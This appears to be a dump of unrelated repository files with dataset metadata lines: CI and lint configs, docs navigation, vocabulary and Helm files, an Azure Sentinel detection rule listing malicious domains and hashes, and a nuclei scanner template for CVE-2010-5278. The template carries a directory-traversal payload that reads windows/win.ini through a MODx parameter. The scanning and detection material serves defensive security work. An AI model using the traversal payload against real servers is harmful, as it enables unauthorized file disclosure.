pearson_correlation: api/training/metrics/pearson_correlation.md - bleu: api/training/metrics/bleu.md - boolean_accuracy: api/training/metrics/boolean_accuracy.md - fbeta_measure: api/training/metrics/fbeta_measure.md - perplexity: api/training/metrics/perplexity.md - covariance: api/training/metrics/covariance.md - unigram_recall: api/training/metrics/unigram_recall.md - conll_coref_scores: api/training/metrics/conll_coref_scores.md - attachment_scores: api/training/metrics/attachment_scores.md - metric: api/training/metrics/metric.md - average: api/training/metrics/average.md - categorical_accuracy: api/training/metrics/categorical_accuracy.md - evalb_bracketing_scorer: api/training/metrics/evalb_bracketing_scorer.md - entropy: api/training/metrics/entropy.md - sequence_accuracy: api/training/metrics/sequence_accuracy.md - span_based_f1_measure: api/training/metrics/span_based_f1_measure.md - auc: api/training/metrics/auc.md - callback_trainer: api/training/callback_trainer.md - metric_tracker: api/training/metric_tracker.md - learning_rate_schedulers: - cosine: api/training/learning_rate_schedulers/cosine.md - slanted_triangular: api/training/learning_rate_schedulers/slanted_triangular.md - noam: api/training/learning_rate_schedulers/noam.md - learning_rate_scheduler: api/training/learning_rate_schedulers/learning_rate_scheduler.md - callbacks: - gradient_norm_and_clip: api/training/callbacks/gradient_norm_and_clip.md - callback: api/training/callbacks/callback.md - checkpoint: api/training/callbacks/checkpoint.md - events: api/training/callbacks/events.md - update_moving_average: api/training/callbacks/update_moving_average.md - post_to_url: api/training/callbacks/post_to_url.md - track_metrics: api/training/callbacks/track_metrics.md - validate: api/training/callbacks/validate.md - log_to_tensorboard: api/training/callbacks/log_to_tensorboard.md - update_learning_rate: api/training/callbacks/update_learning_rate.md - callback_handler: api/training/callbacks/callback_handler.md - update_momentum: api/training/callbacks/update_momentum.md - no_op_trainer: api/training/no_op_trainer.md - util: api/training/util.md - moving_average: api/training/moving_average.md - checkpointer: api/training/checkpointer.md - optimizers: api/training/optimizers.md - momentum_schedulers: - inverted_triangular: api/training/momentum_schedulers/inverted_triangular.md - momentum_scheduler: api/training/momentum_schedulers/momentum_scheduler.md - trainer_base: api/training/trainer_base.md - trainer_pieces: api/training/trainer_pieces.md - scheduler: api/training/scheduler.md - trainer: api/training/trainer.md - tensorboard_writer: api/training/tensorboard_writer.md - Roadmap: ROADMAP.md - Contributing: CONTRIBUTING.md - Licence: LICENSE.md markdown_extensions: - toc: permalink: '#' - markdown.extensions.codehilite: guess_lang: true - admonition - codehilite - extra
56.154856
127
0.780369
4b3d76da3793376c82ec0fc66aff986c872598bc
340
yml
YAML
.travis.yml
ShaunEdiger/runway
2472b7a6854655e20605d2d64476d38812c13dd6
[ "Apache-2.0" ]
null
null
null
.travis.yml
ShaunEdiger/runway
2472b7a6854655e20605d2d64476d38812c13dd6
[ "Apache-2.0" ]
null
null
null
.travis.yml
ShaunEdiger/runway
2472b7a6854655e20605d2d64476d38812c13dd6
[ "Apache-2.0" ]
1
2020-02-29T04:49:11.000Z
2020-02-29T04:49:11.000Z
--- language: python addons: apt: packages: - pandoc - sed python: - "2.7" - "3.5" - "3.6" install: - "pip install Send2Trash awacs awscli docopt flake8 flake8-docstrings \ pep8-naming future pyhcl pylint typing yamllint zgitignore stacker~=1.4 \ botocore>=1.9.0 boto3>=1.6.0 pylint" script: make travis
20
78
0.644118
efef35f240eca739598c027b3aca13342ace09e1
1,953
yml
YAML
.vsts-ci/windows/templates/windows-packaging.yml
LittleSouken/PowerShell
bd5dc970874314f3e69b2efe601d791a99e5e10f
[ "MIT" ]
2
2018-09-10T22:55:03.000Z
2021-08-15T16:14:26.000Z
.vsts-ci/windows/templates/windows-packaging.yml
LittleSouken/PowerShell
bd5dc970874314f3e69b2efe601d791a99e5e10f
[ "MIT" ]
53
2021-03-03T16:43:29.000Z
2022-03-09T11:09:20.000Z
.vsts-ci/windows/templates/windows-packaging.yml
LittleSouken/PowerShell
bd5dc970874314f3e69b2efe601d791a99e5e10f
[ "MIT" ]
1
2022-02-03T08:35:46.000Z
2022-02-03T08:35:46.000Z
parameters: - name: pool default: 'Hosted VS2017' - name: jobName default: 'win_packaging' - name: architecture default: 'x64' - name: channel default: 'preview' jobs: - job: ${{ parameters.jobName }}_${{ parameters.channel }}_${{ parameters.architecture }} variables: - name: repoFolder value: PowerShell - name: repoPath value: $(Agent.BuildDirectory)\$(repoFolder) - name: complianceRepoFolder value: compliance - name: complianceRepoPath value: $(Agent.BuildDirectory)\$(complianceRepoFolder) pool: name: ${{ parameters.pool }} displayName: Windows Packaging - ${{ parameters.architecture }} - ${{ parameters.channel }} steps: - checkout: self clean: true path: $(repoFolder) - checkout: ComplianceRepo clean: true path: $(complianceRepoFolder) - powershell: | Get-ChildItem -Path env: displayName: Capture environment condition: succeededOrFailed() - template: /tools/releaseBuild/azureDevOps/templates/insert-nuget-config-azfeed.yml - pwsh: | Import-Module .\tools\ci.psm1 Invoke-CIInstall -SkipUser displayName: Bootstrap condition: succeeded() workingDirectory: $(repoPath) - pwsh: | Import-Module .\tools\ci.psm1 New-CodeCoverageAndTestPackage Invoke-CIFinish -Runtime win7-${{ parameters.architecture }} -channel ${{ parameters.channel }} -Stage Build displayName: Build workingDirectory: $(repoPath) - template: Sbom.yml@ComplianceRepo parameters: BuildDropPath: '$(System.ArtifactsDirectory)/mainBuild' Build_Repository_Uri: $(build.repository.uri) displayName: SBOM - pwsh: | Import-Module .\tools\ci.psm1 New-CodeCoverageAndTestPackage Invoke-CIFinish -Runtime win7-${{ parameters.architecture }} -channel ${{ parameters.channel }} -Stage Package displayName: Package and Test workingDirectory: $(repoPath)
27.507042
116
0.678955
6ddedfc301f6dbe5ac59e3fab0b7ebebe5f69273
111
yml
YAML
enhavo/tradukenda/he/vortaro/konjunkcio.yml
junefish/kurso-zagreba-metodo
d057192dd28b85710614cdf2425bebd52d04b775
[ "CC-BY-4.0" ]
124
2016-03-22T16:53:28.000Z
2022-03-10T15:10:10.000Z
enhavo/tradukenda/he/vortaro/konjunkcio.yml
junefish/kurso-zagreba-metodo
d057192dd28b85710614cdf2425bebd52d04b775
[ "CC-BY-4.0" ]
55
2016-02-01T19:47:49.000Z
2022-02-23T00:00:15.000Z
enhavo/tradukenda/he/vortaro/konjunkcio.yml
junefish/kurso-zagreba-metodo
d057192dd28b85710614cdf2425bebd52d04b775
[ "CC-BY-4.0" ]
55
2016-02-16T19:18:49.000Z
2021-07-04T22:33:33.000Z
aŭ: "או" kaj: "ו, וגם" ke: "ש" kvankam: "אף על פי כן" nek: "וגם לא" ol: "מאשר" se: "אם" sed: "אבל" ĉar: "בגלל"
11.1
22
0.540541
48159ceaef7b5a3500ea2821a359d9123740dfc8
463
yml
YAML
.eslintrc.yml
ikoajs/demo
3ed06908982e332f46afb3d7f842f581bf057e78
[ "MIT" ]
null
null
null
.eslintrc.yml
ikoajs/demo
3ed06908982e332f46afb3d7f842f581bf057e78
[ "MIT" ]
null
null
null
.eslintrc.yml
ikoajs/demo
3ed06908982e332f46afb3d7f842f581bf057e78
[ "MIT" ]
null
null
null
# Support ES2016 features parser: babel-eslint extends: standard rules: arrow-parens: [2, as-needed] eqeqeq: 0 no-return-assign: 0 # fails for arrow functions no-var: 2 no-unused-vars: [1, {"vars": "all", "args": "none"}] no-useless-constructor: 0 semi: [2, never] space-before-function-paren: [2, never] yoda: 0 arrow-spacing: 2 dot-location: [2, "property"] prefer-arrow-callback: 2 accessor-pairs: 0 # getter and setter pairs check
23.15
54
0.678186
34f435a9bfa98c700028a9905187f9ec3788c257
1,052
yaml
YAML
cves/2010/CVE-2010-5278.yaml
evanRubinsteinIT/nuclei-templates
4e57a58b3c8b97a43ded05bca58002c8e10d9a40
[ "MIT" ]
1
2022-03-29T14:34:35.000Z
2022-03-29T14:34:35.000Z
cves/2010/CVE-2010-5278.yaml
P0stSky/nuclei-templates
1f9c9b1dcea01495781ae342a43226660c5fc6b6
[ "MIT" ]
null
null
null
cves/2010/CVE-2010-5278.yaml
P0stSky/nuclei-templates
1f9c9b1dcea01495781ae342a43226660c5fc6b6
[ "MIT" ]
null
null
null
id: CVE-2010-5278 info: name: MODx manager - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/34788 - https://www.cvedetails.com/cve/CVE-2010-5278 tags: cve,cve2010,lfi classification: cve-id: CVE-2010-5278 requests: - method: GET path: - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "bit app support" - "fonts" - "extensions" condition: and part: body # Enhanced by mp on 2022/02/18
30.057143
276
0.652091
c6f47f01b8e6797b1729a758a7af10a0d8c397de
2,985
yaml
YAML
Detections/MultipleDataSources/CERIUMOct292020IOCs.yaml
edgardner-microsoft/Azure-Sentinel
3fbd070123319c03d75e0a0b721254d496448155
[ "MIT" ]
1
2021-08-20T17:06:21.000Z
2021-08-20T17:06:21.000Z
Detections/MultipleDataSources/CERIUMOct292020IOCs.yaml
tomwechsler/Azure-Sentinel
a1dab5b0312a7513b8bdefaed594191eaaf3c10e
[ "MIT" ]
null
null
null
Detections/MultipleDataSources/CERIUMOct292020IOCs.yaml
tomwechsler/Azure-Sentinel
a1dab5b0312a7513b8bdefaed594191eaaf3c10e
[ "MIT" ]
null
null
null
id: c87fb346-ea3a-4c64-ba92-3dd383e0f0b5 name: Known CERIUM domains and hashes description: | 'CERIUM malicious webserver and hash values for maldocs and malware. Matches domain name IOCs related to the CERIUM activity group with CommonSecurityLog, DnsEvents, and VMConnection dataTypes.' severity: High requiredDataConnectors: - connectorId: DNS dataTypes: - DnsEvents - connectorId: AzureMonitor(VMInsights) dataTypes: - VMConnection - connectorId: CiscoASA dataTypes: - CommonSecurityLog - connectorId: PaloAltoNetworks dataTypes: - CommonSecurityLog - connectorId: AzureFirewall dataTypes: - AzureDiagnostics queryFrequency: 1d queryPeriod: 1d triggerOperator: gt triggerThreshold: 0 tactics: - CommandAndControl - CredentialAccess query: | let DomainNames = "miniodaum.ml"; let SHA256Hash = dynamic (["53f5773bbfbfbee660989d135c042c9f6f69024b9a4b65bdc0dfd44771762257", "0897c80df8b80b4c49bf1ccf876f5f782849608b830c3b5cb3ad212dc3e19eff"]); (union isfuzzy=true (CommonSecurityLog | parse Message with * '(' DNSName ')' * | where isnotempty(FileHash) | where FileHash in (SHA256Hash) or DNSName =~ DomainNames | extend Account = SourceUserID, Computer = DeviceName, IPAddress = SourceIP ), (DnsEvents | extend DNSName = Name | where isnotempty(DNSName) | where DNSName =~ DomainNames | extend IPAddress = ClientIP ), (VMConnection | parse RemoteDnsCanonicalNames with * '["' DNSName '"]' * | where isnotempty(DNSName) | where DNSName =~ DomainNames | extend IPAddress = RemoteIp ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallDnsProxy" | parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNSO_DO " " EDNS0_Buffersize " " Responce_Code " " Responce_Flags " " Responce_Size " " Response_Duration | where Request_Name has_any (DomainNames) | extend DNSName = Request_Name | extend IPAddress = ClientIP ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallApplicationRule" | parse msg_s with Protocol 'request from ' SourceHost ':' SourcePort 'to ' DestinationHost ':' DestinationPort '. Action:' Action | where isnotempty(DestinationHost) | where DestinationHost has_any (DomainNames) | extend DNSName = DestinationHost | extend IPAddress = SourceHost ) ) | extend timestamp = TimeGenerated, AccountCustomEntity = Account, HostCustomEntity = Computer, IPCustomEntity = IPAddress entityMappings: - entityType: Account fieldMappings: - identifier: FullName columnName: AccountCustomEntity - entityType: Host fieldMappings: - identifier: FullName columnName: HostCustomEntity - entityType: IP fieldMappings: - identifier: Address columnName: IPCustomEntity
35.535714
276
0.729648
7be5c45cd2d593a30c4a2619520c027d53ebc67f
370
yaml
YAML
stable/datadog/Chart.yaml
aegixx/charts
668fcdf724b04bd7d3cf271f55ba8be420859d25
[ "Apache-2.0" ]
4
2017-06-14T01:48:10.000Z
2018-01-07T05:16:44.000Z
stable/datadog/Chart.yaml
gokulchandrap/Helm-Charts-Main
668fcdf724b04bd7d3cf271f55ba8be420859d25
[ "Apache-2.0" ]
1
2017-12-12T05:32:13.000Z
2017-12-12T05:32:13.000Z
stable/datadog/Chart.yaml
gokulchandrap/Helm-Charts-Main
668fcdf724b04bd7d3cf271f55ba8be420859d25
[ "Apache-2.0" ]
2
2017-09-21T10:50:12.000Z
2019-05-28T08:59:27.000Z
name: datadog version: 0.2.1 description: DataDog Agent keywords: - monitoring - alerting - metric home: https://www.datadoghq.com icon: https://datadog-live.imgix.net/img/dd_logo_70x75.png sources: - https://app.datadoghq.com/account/settings#agent/kubernetes - https://github.com/DataDog/docker-dd-agent maintainers: - name: Greg Taylor email: gtaylor@gc-taylor.com
23.125
61
0.772973
d0521f27f6e195ad1cee6173ce689d9b565deb64
128
yaml
YAML
tests/mainnet/altair/ssz_static/SigningData/ssz_random/case_4/value.yaml
ethereum/eth2.0-spec-tests
94b687328daa52071d05d0262ec0a46961bef504
[ "MIT" ]
30
2019-04-25T20:14:27.000Z
2021-04-16T06:08:26.000Z
tests/mainnet/altair/ssz_static/SigningData/ssz_random/case_4/value.yaml
ethereum/eth2.0-spec-tests
94b687328daa52071d05d0262ec0a46961bef504
[ "MIT" ]
19
2019-05-06T18:05:44.000Z
2020-12-18T17:04:02.000Z
tests/mainnet/altair/ssz_static/SigningData/ssz_random/case_4/value.yaml
ethereum/eth2.0-spec-tests
94b687328daa52071d05d0262ec0a46961bef504
[ "MIT" ]
8
2019-05-01T00:05:46.000Z
2021-03-21T18:36:02.000Z
version https://git-lfs.github.com/spec/v1 oid sha256:fa15b9cb7c3f68c386a4a5daee234ca534966e98926319376dc1af4e8f475f41 size 162
32
75
0.882813
bda012089e41416f0f7dbfed88371e2282147412
127
yaml
YAML
tests/general/phase0/ssz_generic/bitlist/valid/bitlist_512_random_0/value.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
30
2019-04-25T20:14:27.000Z
2021-04-16T06:08:26.000Z
tests/general/phase0/ssz_generic/bitlist/valid/bitlist_512_random_0/value.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
19
2019-05-06T18:05:44.000Z
2020-12-18T17:04:02.000Z
tests/general/phase0/ssz_generic/bitlist/valid/bitlist_512_random_0/value.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
8
2019-05-01T00:05:46.000Z
2021-03-21T18:36:02.000Z
version https://git-lfs.github.com/spec/v1 oid sha256:7e9ab638e1edec56694c464406810021cfd8170819bd53483a26a406204748a5 size 83
31.75
75
0.88189
c2e8d6b15139c8c7e199f84c02f4848f15a8c25d
700
yml
YAML
.travis.yml
sorah/roadworker
d70b6ec6c394a06d4b8dd631c7928bdc3d9c2ba2
[ "MIT" ]
null
null
null
.travis.yml
sorah/roadworker
d70b6ec6c394a06d4b8dd631c7928bdc3d9c2ba2
[ "MIT" ]
null
null
null
.travis.yml
sorah/roadworker
d70b6ec6c394a06d4b8dd631c7928bdc3d9c2ba2
[ "MIT" ]
null
null
null
language: ruby rvm: - 2.0.0 script: - bundle install - bundle exec rake env: global: - secure: "NZe0Hund5w1yLOjGUKtAEGuU65VXcc7uwxXbT2P7pNL3gVXsdlVMZq7ae9jaQsH/x/q50oI+LVj6ZsLoSNDDxgPhPc1TPNxPO3U52CAbiZtWV2CeZ0DG07Hlrkoggi6djsMCWzjLMiMrXuOf0ODAxLl0Ie05fVUPL31/X4Cl/BE=" - secure: "M/zotCs/+c5wHpN+T5cxOC/FAZHpWbdOMoP/N4x68l6CN+Lr2mpElYZH9C+UDIaLAcZFdxCcCfmFVwfs6eR+BOpKtvm0EfRs2wmnYcfxqwTLqMBD0Z557uxbucGNYX7UBdvcHBTqd6XfpdkeohALbUITyf7LouEbJWX/erWoEjA=" - TEST_ELB=roadworker-1619064454.ap-northeast-1.elb.amazonaws.com. - TEST_CF=dwq5bksfxh5xn.cloudfront.net. - TEST_DELAY=0.3 - TEST_VPC_REGION=ap-northeast-1 - TEST_VPC1=vpc-18f5097d - TEST_VPC2=vpc-e5f50980 - TEST_INTERVAL=3
38.888889
186
0.828571
f87a98dc28b8eddc55772a7f2e5cce9e4753a0ca
4,715
yml
YAML
.github/workflows/main.yml
dbt-labs/dbt-rpc
70c1a6ba011be6a82d09b8af0b391184a288dd7e
[ "Apache-2.0" ]
4
2021-10-13T01:30:29.000Z
2022-03-25T16:31:39.000Z
.github/workflows/main.yml
dbt-labs/dbt-rpc
70c1a6ba011be6a82d09b8af0b391184a288dd7e
[ "Apache-2.0" ]
26
2021-10-12T13:29:38.000Z
2022-03-28T13:12:29.000Z
.github/workflows/main.yml
dbt-labs/dbt-rpc
70c1a6ba011be6a82d09b8af0b391184a288dd7e
[ "Apache-2.0" ]
null
null
null
# **what?** # Runs code quality checks, tests, and verifies python build on # all code commited to the repository. This workflow should not # require any secrets since it runs for PRs from forked repos. # By default, secrets are not passed to workflows running from # a forked repo. # **why?** # Ensure code for dbt meets a certain quality standard. # **when?** # This will run for all PRs, when code is pushed to a release # branch, and when manually triggered. name: Tests and Code Checks on: push: branches: - "main" - "develop" - "*.latest" - "releases/*" - "move-tests2" pull_request: workflow_dispatch: # run this once per night to ensure no regressions from latest dbt-core changes schedule: - cron: '0 5 * * *' # 5 UTC permissions: read-all defaults: run: shell: bash jobs: code-quality: name: ${{ matrix.toxenv }} runs-on: ubuntu-latest strategy: fail-fast: false matrix: toxenv: [flake8] env: TOXENV: ${{ matrix.toxenv }} PYTEST_ADDOPTS: "-v --color=yes" steps: - name: Check out the repository uses: actions/checkout@v2 with: persist-credentials: false - name: Set up Python uses: actions/setup-python@v2 - name: Install python dependencies run: | pip install --user --upgrade pip pip install tox pip --version tox --version - name: Run tox run: tox tests: name: test / python ${{ matrix.python-version }} runs-on: ubuntu-latest strategy: fail-fast: false matrix: python-version: [3.7, 3.8, 3.9] env: TOXENV: "py" PYTEST_ADDOPTS: "-v --color=yes" DBT_ENABLE_LEGACY_LOGGER: True steps: - name: Check out the repository uses: actions/checkout@v2 with: persist-credentials: false - name: Set up postgres run: | sudo systemctl start postgresql.service pg_isready sudo -u postgres bash tests/setup_db.sh - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} - name: Install python dependencies run: | pip install --user --upgrade pip pip install tox pip --version tox --version - name: Run tox run: tox build: name: build packages runs-on: ubuntu-latest steps: - name: Check out the repository uses: actions/checkout@v2 with: persist-credentials: false - name: Set up Python uses: actions/setup-python@v2 with: python-version: 3.8 - name: Install python dependencies run: | pip install --user --upgrade pip pip install --upgrade setuptools wheel twine check-wheel-contents pip --version - name: Build distributions run: python setup.py sdist bdist_wheel - name: Show distributions run: ls -lh dist/ - name: Check distribution descriptions run: | twine check dist/* - name: Check wheel contents run: | check-wheel-contents dist/*.whl --ignore W007,W008 - uses: actions/upload-artifact@v2 with: name: dist path: dist/ test-build: name: verify packages / python ${{ matrix.python-version }} / ${{ matrix.os }} needs: build runs-on: ${{ matrix.os }} strategy: fail-fast: false matrix: os: [ubuntu-latest, macos-latest, windows-latest] python-version: [3.7, 3.8, 3.9] steps: - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} - name: Install python dependencies run: | pip install --user --upgrade pip pip install --upgrade wheel pip --version - uses: actions/download-artifact@v2 with: name: dist path: dist/ - name: Show distributions run: ls -lh dist/ - name: Install wheel distributions run: | find ./dist/*.whl -maxdepth 1 -type f | xargs pip install --force-reinstall --find-links=dist/ - name: Check wheel distributions run: | dbt-rpc --version - name: Install source distributions run: | find ./dist/*.gz -maxdepth 1 -type f | xargs pip install --force-reinstall --find-links=dist/ - name: Check source distributions run: | dbt-rpc --version
23.341584
104
0.57667
f8c7fcea1c142bc88856d7771e1b96f8497dffa0
1,003
yml
YAML
windows/etw-providers/Microsoft-Windows-DirectManipulation/events/event-85.yml
SarguelUnda/OSSEM-DD
afd9b27897346dfa3b3f43d2d403c3f5c5f86214
[ "MIT" ]
null
null
null
windows/etw-providers/Microsoft-Windows-DirectManipulation/events/event-85.yml
SarguelUnda/OSSEM-DD
afd9b27897346dfa3b3f43d2d403c3f5c5f86214
[ "MIT" ]
null
null
null
windows/etw-providers/Microsoft-Windows-DirectManipulation/events/event-85.yml
SarguelUnda/OSSEM-DD
afd9b27897346dfa3b3f43d2d403c3f5c5f86214
[ "MIT" ]
null
null
null
title: Event 85 - Manipulation_Telemetry description: null platform: windows log_source: Microsoft-Windows-DirectManipulation event_code: '85' event_version: '0' event_fields: - standard_name: TBD standard_type: TBD name: AppUserModeId type: UnicodeString description: null sample_value: null - standard_name: TBD standard_type: TBD name: AppType type: UInt32 description: null sample_value: null - standard_name: TBD standard_type: TBD name: InteractionLibraryType type: UInt32 description: null sample_value: null - standard_name: TBD standard_type: TBD name: UniqueKey type: UInt64 description: null sample_value: null - standard_name: TBD standard_type: TBD name: SurfaceWidth type: UInt16 description: null sample_value: null - standard_name: TBD standard_type: TBD name: SurfaceHeight type: UInt16 description: null sample_value: null references: null tags: - etw_level_Informational - etw_opcode_Start - etw_task_Manipulation_Telemetry
20.469388
48
0.77667
925586959dd67e26ad168fa82f636f253a8e1d4c
496
yml
YAML
src/Wineot/BackEnd/CRUDBundle/Resources/config/routing/country.yml
shked0wn/Wineot
14de23e2fdba2d3768a71d4c8d8411334a9de3df
[ "MIT" ]
null
null
null
src/Wineot/BackEnd/CRUDBundle/Resources/config/routing/country.yml
shked0wn/Wineot
14de23e2fdba2d3768a71d4c8d8411334a9de3df
[ "MIT" ]
null
null
null
src/Wineot/BackEnd/CRUDBundle/Resources/config/routing/country.yml
shked0wn/Wineot
14de23e2fdba2d3768a71d4c8d8411334a9de3df
[ "MIT" ]
null
null
null
wineot_back_end_crud_country: path: / defaults: { _controller: WineotBackEndCRUDBundle:Country:index } wineot_back_end_crud_country_add: path: /add defaults: { _controller: WineotBackEndCRUDBundle:Country:add } wineot_back_end_crud_country_edit: path: /{id}/edit defaults: { _controller: WineotBackEndCRUDBundle:Country:edit } wineot_back_end_crud_country_delete: path: /{id}/delete defaults: { _controller: WineotBackEndCRUDBundle:Country:delete }
41.333333
69
0.756048
1335eae8c8be783b22e7f91e75fa3f96a4a4835d
48
yml
YAML
config.yml
innc11/GiftCode
557085219eded064a2d46cab4d36e29e147c69da
[ "Apache-2.0" ]
1
2021-07-13T05:40:55.000Z
2021-07-13T05:40:55.000Z
config.yml
innc11/GiftCode
557085219eded064a2d46cab4d36e29e147c69da
[ "Apache-2.0" ]
1
2020-03-08T00:04:30.000Z
2020-07-18T16:04:30.000Z
config.yml
innc11/GiftCode
557085219eded064a2d46cab4d36e29e147c69da
[ "Apache-2.0" ]
1
2021-07-23T01:54:57.000Z
2021-07-23T01:54:57.000Z
charPool: "abcdefghijklmnopqrstuvwxyz0123456789"
48
48
0.916667
56e39182de926c6c6316e750fa14117f1619c411
2,264
yml
YAML
docs-ref-autogen/com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
5
2021-08-20T15:24:19.000Z
2022-02-20T17:06:14.000Z
docs-ref-autogen/com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs-ref-autogen/com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update.yml
azure-sdk/azure-docs-sdk-java
66cc376be8bb1e1246731b879cc1f8fba76ea946
[ "CC-BY-4.0", "MIT" ]
1
2021-08-20T15:24:21.000Z
2021-08-20T15:24:21.000Z
### YamlMime:JavaMember uid: "com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update*" fullName: "com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update" name: "update" nameWithType: "SshPublicKeysClient.update" members: - uid: "com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update(java.lang.String,java.lang.String,com.azure.resourcemanager.compute.models.SshPublicKeyUpdateResource)" fullName: "com.azure.resourcemanager.compute.fluent.SshPublicKeysClient.update(String resourceGroupName, String sshPublicKeyName, SshPublicKeyUpdateResource parameters)" name: "update(String resourceGroupName, String sshPublicKeyName, SshPublicKeyUpdateResource parameters)" nameWithType: "SshPublicKeysClient.update(String resourceGroupName, String sshPublicKeyName, SshPublicKeyUpdateResource parameters)" summary: "Updates a new SSH public key resource." parameters: - description: "The name of the resource group." name: "resourceGroupName" type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />" - description: "The name of the SSH public key." name: "sshPublicKeyName" type: "<xref href=\"java.lang.String?alt=java.lang.String&text=String\" data-throw-if-not-resolved=\"False\" />" - description: "Parameters supplied to update the SSH public key." name: "parameters" type: "<xref href=\"com.azure.resourcemanager.compute.models.SshPublicKeyUpdateResource?alt=com.azure.resourcemanager.compute.models.SshPublicKeyUpdateResource&text=SshPublicKeyUpdateResource\" data-throw-if-not-resolved=\"False\" />" syntax: "public abstract SshPublicKeyResourceInner update(String resourceGroupName, String sshPublicKeyName, SshPublicKeyUpdateResource parameters)" returns: description: "specifies information about the SSH public key." type: "<xref href=\"com.azure.resourcemanager.compute.fluent.models.SshPublicKeyResourceInner?alt=com.azure.resourcemanager.compute.fluent.models.SshPublicKeyResourceInner&text=SshPublicKeyResourceInner\" data-throw-if-not-resolved=\"False\" />" type: "method" metadata: {} package: "com.azure.resourcemanager.compute.fluent" artifact: com.azure.resourcemanager:azure-resourcemanager-compute:2.2.0
75.466667
249
0.802562
71380c6497ff82b204e3ab5c83c21515817aa1e4
860
yml
YAML
_patterns/buttons/config.yml
trebird/design
326d22741c9e0564280f25711d5ec7c2b3590b83
[ "MIT" ]
null
null
null
_patterns/buttons/config.yml
trebird/design
326d22741c9e0564280f25711d5ec7c2b3590b83
[ "MIT" ]
1
2020-11-25T13:05:38.000Z
2020-12-03T20:42:19.000Z
_patterns/buttons/config.yml
trebird/portfolio
326d22741c9e0564280f25711d5ec7c2b3590b83
[ "MIT" ]
null
null
null
patterns: basic: fields: - name: url type: url example: "/case-studies/natures-care/" - name: text type: text example: "view project" glow: fields: - name: url type: url example: "mailto:hello@treawnaharvey.ca" - name: text type: text example: say hello - name: target type: text example: "_blank" btn-work: fields: - name: url type: url example: "/case-studies/mindu/" - name: text-color type: string example: "btn-mindu" - name: btn-work-shadow type: string example: "btn-mindu-shadow" btn-next: fields: - name: url type: url example: "/case-studies/mindu/" - name: stroke-color type: string example: "#433cce"
20
48
0.510465
a8d0bd353a01052d802b76f0d9e9d030ed0ac64b
380
yml
YAML
meta/main.yml
DjeDt/ansistrano-symfony-deploy
025efb7d10ea0aa1b648973dd2c5d94412f7184f
[ "MIT" ]
null
null
null
meta/main.yml
DjeDt/ansistrano-symfony-deploy
025efb7d10ea0aa1b648973dd2c5d94412f7184f
[ "MIT" ]
null
null
null
meta/main.yml
DjeDt/ansistrano-symfony-deploy
025efb7d10ea0aa1b648973dd2c5d94412f7184f
[ "MIT" ]
null
null
null
--- dependencies: - carlosbuenosvinos.ansistrano-deploy galaxy_info: author: Conny Brunnkvist description: Common post-deploy tasks for Symfony projects license: MIT min_ansible_version: 2.4 platforms: - name: GenericUNIX versions: - any galaxy_tags: - web - ansistrano - ansistrano-deploy - deploy - deployment - symfony
17.272727
60
0.673684
2569e067e1865412b380bddd345571c5cd1d2883
6,429
yaml
YAML
sdk/storage/azure-storage-blob/tests/recordings/test_block_blob.test_upload_blob_from_url_with_cpk.yaml
aiven/azure-sdk-for-python
8764dc07423beca46ed0b51212d81289d9e52c60
[ "MIT" ]
1
2020-03-05T18:10:35.000Z
2020-03-05T18:10:35.000Z
sdk/storage/azure-storage-blob/tests/recordings/test_block_blob.test_upload_blob_from_url_with_cpk.yaml
aiven/azure-sdk-for-python
8764dc07423beca46ed0b51212d81289d9e52c60
[ "MIT" ]
2
2020-03-03T23:11:13.000Z
2020-03-30T18:50:55.000Z
sdk/storage/azure-storage-blob/tests/recordings/test_block_blob.test_upload_blob_from_url_with_cpk.yaml
aiven/azure-sdk-for-python
8764dc07423beca46ed0b51212d81289d9e52c60
[ "MIT" ]
null
null
null
interactions: - request: body: null headers: Accept: - '*/*' Accept-Encoding: - gzip, deflate Connection: - keep-alive Content-Length: - '0' User-Agent: - azsdk-python-storage-blob/12.6.0b2 Python/3.8.5 (Windows-10-10.0.19041-SP0) x-ms-date: - Tue, 01 Dec 2020 21:48:50 GMT x-ms-version: - '2020-04-08' method: PUT uri: https://storagename.blob.core.windows.net/utcontainer7ce1476?restype=container response: body: string: '' headers: content-length: - '0' date: - Tue, 01 Dec 2020 21:48:47 GMT etag: - '"0x8D89642E2652DEC"' last-modified: - Tue, 01 Dec 2020 21:48:48 GMT server: - Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-version: - '2020-04-08' status: code: 201 message: Created - request: body: This is test data to be copied over. headers: Accept: - '*/*' Accept-Encoding: - gzip, deflate Connection: - keep-alive Content-Length: - '36' Content-Type: - application/octet-stream If-None-Match: - '*' User-Agent: - 